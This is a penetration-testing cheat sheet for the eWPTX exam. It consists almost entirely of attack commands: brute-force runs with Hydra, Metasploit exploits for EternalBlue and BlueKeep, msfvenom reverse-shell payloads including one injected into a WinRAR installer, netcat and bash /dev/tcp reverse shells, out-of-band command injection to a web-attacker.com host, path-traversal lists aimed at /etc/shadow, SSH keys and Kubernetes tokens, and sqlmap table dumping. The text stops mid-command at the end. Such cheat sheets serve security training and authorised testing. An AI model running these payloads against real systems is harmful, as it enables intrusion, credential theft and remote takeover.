# eWPTX Cheat Sheet ## [Te**sting Checklist and Template**](https://github.com/OWASP/wstg/tree/master/checklists) [OWASP - Web Security Testing Guide](https://owasp.org/www-project-web-security-testing-guide/stable/) * [OWASP Testing Checklist (Excel)](https://raw.githubusercontent.com/OWASP/wstg/master/checklists/checklist.xlsx) * [OWASP Testing Checklist (Markdown)](https://raw.githubusercontent.com/OWASP/wstg/master/checklists/checklist.md) * [Google Spreadsheet template](https://docs.google.com/spreadsheets/d/1csiYqA3DXhpz69K2JCLKN4H-kzkRFlFi/copy?copyCollaborators=false\©Comments=false\&title=WSTG+Checklist) Other CheatSheets: * [CheatSheet OWASP](https://cheatsheetseries.owasp.org/) * [PayloadsAllThingsWeb](https://swisskyrepo.github.io/PayloadsAllTheThings/) ## **Tools** ```bash # Gobuster - Install sudo apt update && sudo apt install -y gobuster # Dirbuster - Install sudo apt update && sudo apt install -y dirb # Nikto - Install sudo apt update && sudo apt install -y nikto # BurpSuite - Install sudo apt update && sudo apt install -y burpsuite # SQLMap - Install sudo apt update && sudo apt install -y sqlmap # XSSer - Install sudo apt update && sudo apt install -y xsser # WPScan - Install sudo apt update && sudo apt install -y wpscan # Hydra - Install sudo apt update && sudo apt install -y hydra ``` * [Burp Suite Configuration](https://dev-angelist.gitbook.io/writeups-and-walkthroughs/portswigger-web-security-academy/information-disclosure) * [Testing Tools Resource](https://owasp.org/www-project-web-security-testing-guide/stable/6-Appendix/A-Testing_Tools_Resource) * More tools info [here](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/) {% hint style="warning" %} In the exam browser extensions shouldn't works, so it's necessary set proxy manually {% endhint %} ## Networking #### **Routing** ```bash # Linux ip route # Windows route print # Mac OS X / Linux netstat -r ``` #### **IP** ```bash # Linux ip a ip -br -c a # Windows ipconfig /all # Mac OS X / Linux ifconfig ``` #### **ARP** ```bash # Linux ip neighbour # Windows arp -a # Mac OS X / Linux arp ``` #### **Ports** ```bash # Linux netstat -tunp netstat -tulpn ss -tnl # Windows netstat -ano # Mac OS X / Linux netstat -p tcp -p udp lsof -n -i4TCP -i4UDP ``` #### **Connect and Scan** ```bash nc -v example.com 80 openssl s_client -connect : openssl s_client -connect : -debug openssl s_client -connect : -state openssl s_client -connect : -quiet # Scan port nc -zv ``` ## Information Gathering ```bash host whatweb whois whois dnsrecon -d wafw00f -l wafw00f -a sublist3r -d theHarvester -d theHarvester -d -b all ``` #### **Google Dorks** ```url site: inurl: site:*.sitename.com intitle: filetype: intitle:index of cache: inurl:auth_user_file.txt inurl:passwd.txt inurl:wp-config.bak ``` #### **DNS** ```bash sudo nano /etc/hosts dnsenum # e.g. dnsenum zonetransfer.me dig dig axfr @DNS-server-name fierce --domain ``` ### **Host Discovery** ```bash ## Ping scan sudo nmap -sn ## ARP scan netdiscover -i eth1 -r # NMAP PORT SCAN nmap ## Skip ping nmap -Pn ## Host discovery + saving into file nmap -sn / > hosts.txt nmap -sn -T4 / -oG - | awk '/Up$/{print $2}' ## Scan all ports nmap -p- ## Open ports scan + saving into file nmap -Pn -sV -T4 -A -oN ports.txt -p- -iL hosts.txt --open ## Port 80 only scan nmap -p 80 ## Custom list of ports scan nmap -p 80,445,3389,8080 ## Custom ports range scan nmap -p1-2000 ## Fast mode & verbose scan nmap -F -v ## UDP scan nmap -sU ## Service scan nmap -sV ## Service + O.S. detection scan sudo nmap -sV -O ## Default Scripts scan nmap -sC nmap -Pn -F -sV -O -sC ## Aggressive scan nmap -Pn -F -A ## Timing (T0=slow ... T5=insanely fast) scan nmap -Pn -F -T5 -sV -O -sC -v ## Output scan nmap -Pn -F -oN outputfile.txt nmap -Pn -F -oX outputfile.xml ## Output to all formats nmap -Pn -sV -sC -O -oA outputfile nmap -Pn -sV -sC -O -oA outputfile nmap -A -oA outputfile ``` ## Footprinting & Scanning #### **Network Discovery** ```bash sudo arp-scan -I eth1 ping sudo nmap -sn tracert google.com #Windows traceroute google.com #Linux ## fping fping -I eth1 -g -a ## fping with no "Host Unreachable errors" fping -I eth1 -g -a fping -I eth1 -g -a 2>/dev/null ``` ## Enumeration ### **Nmap** ```bash sudo nmap -p 445 -sV -sC -O nmap -sU --top-ports 25 --open nmap -p 445 --script smb-protocols nmap -p 445 --script smb-security-mode nmap -p 445 --script smb-enum-sessions nmap -p 445 --script smb-enum-sessions --script-args smbusername=,smbpassword= nmap -p 445 --script smb-enum-shares nmap -p 445 --script smb-enum-shares --script-args smbusername=,smbpassword= nmap -p 445 --script smb-enum-users --script-args smbusername=,smbpassword= nmap -p 445 --script smb-server-stats --script-args smbusername=,smbpassword= nmap -p 445 --script smb-enum-domains--script-args smbusername=,smbpassword= nmap -p 445 --script smb-enum-groups--script-args smbusername=,smbpassword= nmap -p 445 --script smb-enum-services --script-args smbusername=,smbpassword= nmap -p 445 --script smb-enum-shares,smb-ls --script-args smbusername=,smbpassword= nmap -p 445 --script smb-os-discovery nmap -p445 --script=smb-vuln-* ``` ### **Nmblookup** 
nmblookup -A <TARGET_IP>
### **RPCClient** ```bash rpcclient -U "" -N ## RPCCLIENT enumdomusers enumdomgroups lookupnames admin ``` ### **Enum4Linux** ```bash enum4linux -o enum4linux -U enum4linux -S enum4linux -G enum4linux -i enum4linux -r -u "" -p "" enum4linux -a -u "" -p "" enum4linux -U -M -S -P -G ## NULL SESSIONS # 1 - Use “enum4linux -n” to make sure if “<20>” exists: enum4linux -n # 2 - If “<20>” exists, it means Null Session could be exploited. Utilize the following command to get more details: enum4linux # 3 - If confirmed that Null Session exists, you can remotely list all share of the target: smbclient -L WORKGROUP -I -N -U "" # 4 - You also can connect the remote server by applying the following command: smbclient \\\\\\c$ -N -U "" # 5 - Download those files stored on the share drive: smb: \> get file_shared.txt ``` ### **Hydra** ```bash gzip -d /usr/share/wordlists/rockyou.txt.gz hydra -l admin -P /usr/share/wordlists/rockyou.txt smb ``` We can use a wordlist generator tools (how [Cewl](https://app.gitbook.com/s/iS3hadq7jVFgSa8k5wRA/practical-ethical-hacker-notes/tools/cewl)), to create custom wordlists. ### **Metasploit** ```bash # METASPLOIT Starting msfconsole msfconsole -q # METASPLOIT SMB use auxiliary/scanner/smb/smb_version use auxiliary/scanner/smb/smb_enumusers use auxiliary/scanner/smb/smb_enumshares use auxiliary/scanner/smb/smb_login use auxiliary/scanner/smb/pipe_auditor ## set options depends on the selected module set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt set SMBUser set RHOSTS exploit ``` ### **FTP** #### **Nmap** ```bash sudo nmap -p 21 -sV -sC -O nmap -p 21 -sV -O nmap -p 21 --script ftp-anon nmap -p 21 --script ftp-brute --script-args userdb= ``` #### **Ftp Client** ```bash ftp ls cd /../.. get put ``` **Hydra** ```bash hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt -t 4 ftp ``` ### **SSH** #### **Nmap** ```bash # NMAP sudo nmap -p 22 -sV -sC -O nmap -p 22 --script ssh2-enum-algos nmap -p 22 --script ssh-hostkey --script-args ssh_hostkey=full nmap -p 22 --script ssh-auth-methods --script-args="ssh.user=" nmap -p 22 --script=ssh-run --script-args="ssh-run.cmd=cat /home/student/FLAG, ssh-run.username=, ssh-run.password=" nmap -p 22 --script=ssh-brute --script-args userdb= ``` #### **Netcat** ```bash # NETCAT nc nc 22 ``` #### **SSH** ```bash ssh @ 22 ssh root@ 22 ``` #### **Hydra** ```bash hydra -l -P /usr/share/wordlists/rockyou.txt ssh ``` #### **Metasploit** ```bash use auxiliary/scanner/ssh/ssh_login set RHOSTS set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt set STOP_ON_SUCCESS true set VERBOSE true exploit ``` ### **HTTP** #### **Nmap** ```bash sudo nmap -p 80 -sV -O nmap -p 80 --script=http-enum -sV nmap -p 80 --script=http-headers -sV nmap -p 80 --script=http-methods --script-args http-methods.url-path=/webdav/ nmap -p 80 --script=http-webdav-scan --script-args http-methods.url-path=/webdav/ ``` #### **Alternative** ```bash whatweb http browsh --startup-url http:// dirb http:// dirb http:// /usr/share/metasploit-framework/data/wordlists/directory.txt hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-head /admin/ #brute http basic auth hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-get /admin/ #brute http digest hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed" # brute http post form hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed:H=Cookie\: PHPSESSID=if0kg4ss785kmov8bqlbusva3v" #brute http authenticated post form wget curl | more curl -I http:/// curl --digest -u : http:/// lynx ``` #### **Metasploit** ```bash use auxiliary/scanner/http/brute_dirs use auxiliary/scanner/http/robots_txt use auxiliary/scanner/http/http_header use auxiliary/scanner/http/http_login use auxiliary/scanner/http/http_version # Global set setg RHOSTS setg RHOST ## set options depends on the selected module set HTTP_METHOD GET set TARGETURI // set USER_FILE set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt set VERBOSE false set AUTH_URI // exploit ``` ### **SQL** #### **Nmap** ```bash sudo nmap -p 3306 -sV -O nmap -p 3306 --script=mysql-empty-password nmap -p 3306 --script=mysql-info nmap -p 3306 --script=mysql-users --script-args="mysqluser='',mysqlpass=''" nmap -p 3306 --script=mysql-databases --script-args="mysqluser='',mysqlpass=''" nmap -p 3306 --script=mysql-variables --script-args="mysqluser='',mysqlpass=''" nmap -p 3306 --script=mysql-audit --script-args="mysql-audit.username='',mysql-audit.password='',mysql-audit.filename=''" nmap -p 3306 --script=mysql-dump-hashes --script-args="username='',password=''" nmap -p 3306 --script=mysql-query --script-args="query='select count(*) from .;',username='',password=''" nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.10.10.13 ## Microsoft SQL nmap -sV -sC -p 1433 nmap -p 1433 --script ms-sql-info nmap -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 nmap -p 1433 --script ms-sql-empty-password nmap -p 3306 --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-passwords.txt nmap -p 3306 --script ms-sql-query --script-args mssql.username=,mssql.password=,ms-sql-query.query="SELECT * FROM master..syslogins" -oN output.txt nmap -p 3306 --script ms-sql-dump-hashes --script-args mssql.username=,mssql.password= nmap -p 3306 --script ms-sql-xp-cmdshell --script-args mssql.username=,mssql.password=,ms-sql-xp-cmdshell.cmd="ipconfig" nmap -p 3306 --script ms-sql-xp-cmdshell --script-args mssql.username=,mssql.password=,ms-sql-xp-cmdshell.cmd="type c:\flag.txt" ``` ```bash # MYSQL mysql -h -u mysql -h -u root # Mysql client help show databases; use ; select count(*) from ; select load_file("/etc/shadow"); ``` #### **Hydra** ```bash hydra -l -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt mysql ``` #### **Metasploit** ```bash use auxiliary/scanner/mysql/mysql_schemadump use auxiliary/scanner/mysql/mysql_writable_dirs use auxiliary/scanner/mysql/mysql_file_enum use auxiliary/scanner/mysql/mysql_hashdump use auxiliary/scanner/mysql/mysql_login ## MS Sql use auxiliary/scanner/mssql/mssql_login use auxiliary/admin/mssql/mssql_enum use auxiliary/admin/mssql/mssql_enum_sql_logins use auxiliary/admin/mssql/mssql_exec use auxiliary/admin/mssql/mssql_enum_domain_accounts # Global set setg RHOSTS setg RHOST ## set options depends on the selected module set USERNAME root set PASSWORD "" set DIR_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt set VERBOSE false set PASSWORD "" set FILE_LIST /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt set PASSWORD "" set USER_FILE /root/Desktop/wordlist/common_users.txt set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt set VERBOSE false set STOP_ON_SUCCESS true set CMD whoami exploit ``` #### Vulnerability Assessment ```bash # HEARTBLEED nmap -sV --script ssl-enum-ciphers -p nmap -sV --script ssl-heartbleed -p 443 # ETERNALBLUE nmap --script smb-vuln-ms17-010 -p 445 # BLUEKEEP msfconsole use exploit/windows/rdp/cve_2019_0708_bluekeep_rce # LOG4J nmap --script log4shell.nse --script-args log4shell.callback-server=:1389 -p 8080 ``` ```bash searchsploit badblue 2.7 ``` ## Host Based Attacks ### **IIS WEBDAV** ```bash # IIS WEBDAV davtest -url davtest -auth : -url http:///webdav cadaver [OPTIONS] nmap -p 80 --script http-enum -sV ``` ```bash msfvenom -p LHOST= LPORT= -f > shell.asp msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp ``` ```bash hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt http-get /webdav/ ``` ```bash ## METASPLOIT # Global set setg RHOSTS setg RHOST use exploit/multi/handler use exploit/windows/iis/iis_webdav_upload_asp set payload windows/meterpreter/reverse_tcp set LHOST set LPORT set HttpUsername set HttpPassword set PATH /webdav/metasploit.asp ``` ### **RDP** ```bash # RDP nmap -sV ``` ```bash ## METASPLOIT # Global set setg RHOSTS setg RHOST use auxiliary/scanner/rdp/rdp_scanner use auxiliary/scanner/rdp/cve_2019_0708_bluekeep set RPORT # ! Kernel crash may be caused ! use exploit/windows/rdp/cve_2019_0708_bluekeep_rce show targets set target set GROOMSIZE 50 ``` ```bash hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp:// -s ``` ```bash xfreerdp /u: /p: /v:: xfreerdp /u: /p: /v:: /w:1920 /h:1080 /fonts /smart-sizing ``` ### **WINRM** ```bash # WINRM crackmapexec [OPTIONS] evil-winrm -i -u -p nmap --top-ports 7000 nmap -sV -p 5985 ``` ```bash crackmapexec winrm -u -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt crackmapexec winrm -u -p -x "whoami" crackmapexec winrm -u -p -x "systeminfo" ``` ```bash # Command Shell evil-winrm.rb -u -p '' -i ``` ```bash ## METASPLOIT # Global set setg RHOSTS setg RHOST use exploit/windows/winrm/winrm_script_exec set USERNAME set PASSWORD set FORCE_VBS true ``` **Meterpreter** ```bash # meterpreter > background #Switch from a Meterpreter session to the msfconsole command line cat cd checksum md5 /bin/bash clearev download Filename /root/**** #Download From victm machine to your machine edit execute -f ifconfig getenv getenv PATH getuid hashdump idletime ifconfig lpwd ls migrate mkdir ps pwd resource rmdir search -f *.txt shell #run a standard operating system shell sysinfo #information about the victm Machine upload /****/exploit.exe C://Windows #Upload from your machine to victm machine ``` ## **Payloads** #### **MSFVenom shells** ```bash msfvenom --list payloads msfvenom --list formats msfvenom --list encoders # Win 32bit msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > .exe # Win 64bit msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe > .exe # Linux 32bit msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > # Linux 64bit msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= LPORT= -f elf > # Win 32bit + shikata_ga_nai encoded msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -e x86/shikata_ga_nai -f exe > .exe # Use more encoding iterations msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -i 10 -e x86/shikata_ga_nai -f exe > .exe # Linux 32bit + shikata_ga_nai encoded msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -i 10 -e x86/shikata_ga_nai -f elf > # Inject into Portable Executables msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -e x86/shikata_ga_nai -i 10 -f exe -x winrar-x32-621.exe > winrar.exe # JSP Java Meterpreter Reverse TCP msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp #TomCat content management system # PHP msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php\ #PHP Web Application cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php ``` #### **MSF Staged and Non Staged Payload** ```bash # MSF STAGED Payload windows/x64/meterpreter/reverse_tcp # MSF NON-STAGED Payload windows/x64/meterpreter_reverse_https ``` ```bash # Upload the payload on the target and try it with MSFconsole cd Payloads sudo python -m http.server 8080 msfconsole -q use multi/handler set payload set LHOST set LPORT run ``` ```bash # Automation ls -lah /usr/share/metasploit-framework/scripts/resource # Create a handler resource nano handler.rc # Insert the following lines use multi/handler set payload windows/meterpreter/reverse_tcp set LHOST set LPORT run # Save it and exit msfconsole -q -r handler.rc # msfconsole resource handler.rc # Export inserted msfconsole commands into a resource script makerc .rc ``` #### **Shells** ```bash # NETCAT - Install sudo apt update && sudo apt install -y netcat # or upload the nc.exe on the target machine nc nc -nv nc -nvu ## NC Listener nc -nvlp nc -nvlup ## Transfer files # Target machine nc.exe -nvlp > test.txt # Attacker machine echo "Hello target" > test.txt nc -nv < test.txt ``` ```bash # BIND SHELL ## Target Win machine - Bind shell listener with executable cmd.exe nc.exe -nvlp -e cmd.exe ## Attacker Linux machine nc -nv ## Target Linux machine - Bind shell listener with /bin/bash nc -nvlp -c /bin/bash ## Attacker Win machine nc.exe -nv ``` ```bash # REVERSE SHELL ## Attacker Linux machine nc -nvlp ## Target Win machine nc.exe -nv -e cmd.exe ## Attacker Linux machine nc -nvlp ## Target Linux machine nc -nv -e /bin/bash ``` ```bash # Spawn shells python -c 'import pty; pty.spawn("/bin/sh")' import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash") echo os.system('/bin/bash') /bin/sh -i bash -i >& /dev/tcp//4444 0>&1 & /dev/tcp//4444 0>&1'"); ?> /usr/bin/script -qc /bin/bash /dev/null perl -e 'exec "/bin/sh";' perl: exec "/bin/sh"; ruby: exec "/bin/sh" lua: os.execute('/bin/sh') IRB: exec "/bin/sh" vi: :!bash vi: :set shell=/bin/bash:shell nmap: !sh ``` **IIS/FTP** ```bash # Targeting IIS/FTP nmap -sV -sC -p21,80 ## Try anonymous:anonymous ftp ## Brute-force FTP hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt ftp hydra -l administrator -P /usr/share/wordlists/metasploit/unix_users.txt ftp -I hydra -l -P /usr/share/wordlists/metasploit/unix_users.txt ftp -I ## Generate an .asp reverse shell payload cd / ip -br -c a msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f asp > shell.aspx ## FTP Login with ftp put shell.aspx ## msfconsole use multi/handler set payload windows/shell/reverse_tcp set LHOST set LPORT ## Open http:///shell.aspx . A reverse shell may be received. ``` **OPENSSH** ```bash # Targeting OPENSSH nmap -sV -sC -p 22 b searchsploit OpenSSH 7.1 ## Brute-force SSH hydra -l administrator /usr/share/wordlists/metasploit/unix_users.txt ssh hydra -l -P /usr/share/wordlists/metasploit/unix_users.txt ssh ## SSH Login with ssh @ ## Win bash net localgroup administrators whoami /priv # msfconsole use auxiliary/scanner/ssh/ssh_login setg RHOST setg RHOSTS set USERNAME set PASSWORD run session 1 # CTRL+Z to background sessions -u 1 ``` **SMB** ```bash # Targeting SMB nmap -sV -sC -p 445 ## Brute-force SMB hydra -l administrator -P /usr/share/wordlists/metasploit/unix_passwords.txt smb hydra -l -P /usr/share/wordlists/metasploit/unix_passwords.txt smb ## Enumeration smbclient -L -U smbmap -u -p -H enum4linux -u -p -U ## msfconsole use auxiliary/scanner/smb/smb_enumusers set RHOSTS set SMBUser set SMBPass run ## SMB Login with locate psexec.py cp /usr/share/doc/python3-impacket/examples/psexec.py . chmod +x psexec.py python3 psexec.py Administrator@ python3 psexec.py @ # msfconsole - Meterpreter use exploit/windows/smb/psexec set RHOSTS set SMBUser Administrator set SMBPass set payload windows/x64/meterpreter/reverse_tcp run # Without :, exploit a vulnerability, e.g. EternalBlue use exploit/windows/smb/ms17_010_eternalblue set RHOSTS run ``` **MYSQL** ```bash # Targeting MYSQL (Wordpress) nmap -sV -sC -p 3306,8585 searchsploit MySQL 5.5 ## Brute-force MySql - msfconsole msfconsole -q use auxiliary/scanner/mysql/mysql_login set RHOSTS set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt run ## MYSQL Login with mysql -u root -p -h show databases; use ; show tables; select * from ; ## msfconsole use exploit/windows/smb/ms17_010_eternalblue set RHOSTS run sysinfo cd / cd wamp dir cd www\\wordpress cat wp-config.php shell ``` ## Web Application Penetration Testing ### **Enumeration & Scanning** ```bash nmap -sS -sV -p 80,443,3306 # CURL curl -I curl -X GET curl -X OPTIONS -v curl -X POST curl -X POST /login.php -d "name=john&password=password" -v curl -X PUT curl /uploads/ --upload-file hello.txt curl -X DELETE /uploads/hello.txt -v # Nikto nikto -h http:// -o niktoscan.txt nikto -h http:///index.php?page=arbitrary-file-inclusion.php -Tuning 5 -o nikto.html -Format htm #WPScan wpscan --url http://--enumerate u wpscan --url http:// -e vp --plugins-detection mixed --api-token API_TOKEN wpscan --url http:// -e u --passwords /usr/share/wordlists/rockyou.txt wpscan --url http:// -U admin -P /usr/share/wordlists/rockyou.txt ``` ### **Directory Enumeration** ```bash # Dirbuster dirb http:// # Gobuster gobuster dir -u http:// -w /usr/share/wordlists/dirb/common.txt -b 403,404 gobuster dir -u http:// -w /usr/share/wordlists/dirb/common.txt -b 403,404 -x .php,.xml,.txt -r gobuster dir -u http:///data -w /usr/share/wordlists/dirb/common.txt -b 403,404 -x .php,.xml,.txt -r # Ffuf ## Directory discovery: ffuf -w wordlist.txt -u http://example.com/FUZZ ## File discovery: ffuf -w wordlist.txt -u http://example.com/FUZZ -e .aspx,.php,.txt,.html ## Output of responses with status code: ffuf -w /usr/share/wordlists/dirb/small.txt -u http://example.com/FUZZ -mc 200,301 ## The -maxtime flag offers to end the ongoing fuzzing after the specified time in seconds: ffuf -w wordlist.txt -u http://example.com/FUZZ -maxtime 60 ## Number of threads: ffuf -w wordlist.txt -u http://example.com/FUZZ -t 64 ``` ### **Login Brute Force** **Hydra** ```bash # Basic auth attacks (brute-force) hydra -L -P http-post-form "/login.php:login=^USER^&password=^PASS^&security_level=0&form=submit:Invalid credentials or user not activated!" ``` ### Information Disclosure * checks every page source searching sensitive data (prevalent into comments) * checks robots.txt file [Information Disclosure - Portswigger Academy](https://dev-angelist.gitbook.io/writeups-and-walkthroughs/portswigger-web-security-academy/information-disclosure) ### **Command Injection** #### Ways of injecting OS commands ```bash & && | || ; Newline (0x0a or \n) ` injected command ` $( injected command ) ``` #### Useful commands | Purpose of command | Linux | Windows | | --------------------- | ------------- | --------------- | | Name of current user | `whoami` | `whoami` | | Operating system | `uname -a` | `ver` | | Network configuration | `ifconfig` | `ipconfig /all` | | Network connections | `netstat -an` | `netstat -an` | | Running processes | `ps -ef` | `tasklist` | #### Blind OS command injection vulnerabilities ```bash #blind OS command injection using time delays & ping -c 10 127.0.0.1 & #blind OS command injection by redirecting output & whoami > /var/www/static/whoami.txt & #blind OS command injection using out-of-band (OAST) techniques & nslookup kgji2ohoyw.web-attacker.com & & nslookup `whoami`.kgji2ohoyw.web-attacker.com & wwwuser.kgji2ohoyw.web-attacker.com ``` ### **Path/Directory Traversal** ```url #Linux https://insecure-website.com/loadImage?filename=../../../../../../etc/passwd #Windows https://insecure-website.com/loadImage?filename=..\..\..\..\..\..\windows\win.ini ``` #### **Other Payloads** ```url ../ ..\ ..\/ %2e%2e%2f %252e%252e%252f %c0%ae%c0%ae%c0%af %uff0e%uff0e%u2215 %uff0e%uff0e%u2216 . = %u002e / = %u2215 \ = %u2216 . = %c0%2e, %e0%40%ae, %c0ae / = %c0%af, %e0%80%af, %c0%2f \ = %c0%5c, %c0%80%5c ..././ ...\.\ ..;/ ..;/..;/sensitive.txt . = %252e / = %252f \ = %255c file:///etc/passwd http://127.0.0.1:8080 /etc/issue /etc/passwd /etc/shadow /etc/group /etc/hosts /etc/motd /etc/mysql/my.cnf /proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor) /proc/self/environ /proc/version /proc/cmdline /proc/sched_debug /proc/mounts /proc/net/arp /proc/net/route /proc/net/tcp /proc/net/udp /proc/self/cwd/index.php /proc/self/cwd/main.py /home/$USER/.bash_history /home/$USER/.ssh/id_rsa /run/secrets/kubernetes.io/serviceaccount/token /run/secrets/kubernetes.io/serviceaccount/namespace /run/secrets/kubernetes.io/serviceaccount/certificate /var/run/secrets/kubernetes.io/serviceaccount /var/lib/mlocate/mlocate.db /var/lib/mlocate.db /var/log/apache/access.log /var/log/apache/error.log /var/log/httpd/error_log /usr/local/apache/log/error_log /usr/local/apache2/log/error_log /var/log/nginx/access.log /var/log/nginx/error.log /var/log/vsftpd.log /var/log/sshd.log /var/log/mail %252e%252e/%252e%252e/%252e%252e//etc/passwd %252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd %252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd %252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd %252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd %252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd %252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd ../../../../../../../../../etc/passwd ../../../../../../../../etc/passwd ../../../../../../../etc/passwd ../../../../../../etc/passwd ../../../../../etc/passwd ../../../../etc/passwd ../../../etc/passwd %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 /../../../../../../../../../../../etc/passwd%00.jpg /../../../../../../../../etc/passwd%00.gif ``` ### **SQL Injection** [SQLi Portswigger Cheatsheet](https://portswigger.net/web-security/sql-injection/cheat-sheet) ### **SQLMap** ```bash sqlmap -r -p sqlmap -r Post.req sqlmap -u "http:///sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title sqlmap -u "http://10.10.10.10/file.php?id=1" -p id #GET Method sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" #POST Method ``` **Get database if injection Exists** ```bash sqlmap -r login.req --dbs sqlmap -u "http://10.10.10.10/file.php?id=1" --dbs #determine the databases: sqlmap -u "http://10.10.10.10/file.php?id=1" -p id --dbs #GET Method sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" --dbs #POST Method # List databases sqlmap -u "http:///sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title --dbs sqlmap -u "http:///sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP --tables sqlmap -u "http:///sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users --columns sqlmap -u "http:///sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users -C admin,password,email --dump ``` **Get Tables in a Database** ```bash sqlmap -r login.req -D dbname --tables #determine the tables: sqlmap -u "http://10.10.10.10/file.php?id=1" -D dbname --common-tables #if tables not available, guess tables using common names sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname --tables #GET Method sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname --tables #POST Method ``` **Get data in a Database tables** ```bash sqlmap -r login.req -D dbname -T table_name --dump sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname -T table_name --dump #GET Method sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname -T table_name --dump #POST Method ``` **Get OS-Shell** ```bash sqlmap -u "http://10.10.10.10/file.php?id=1" 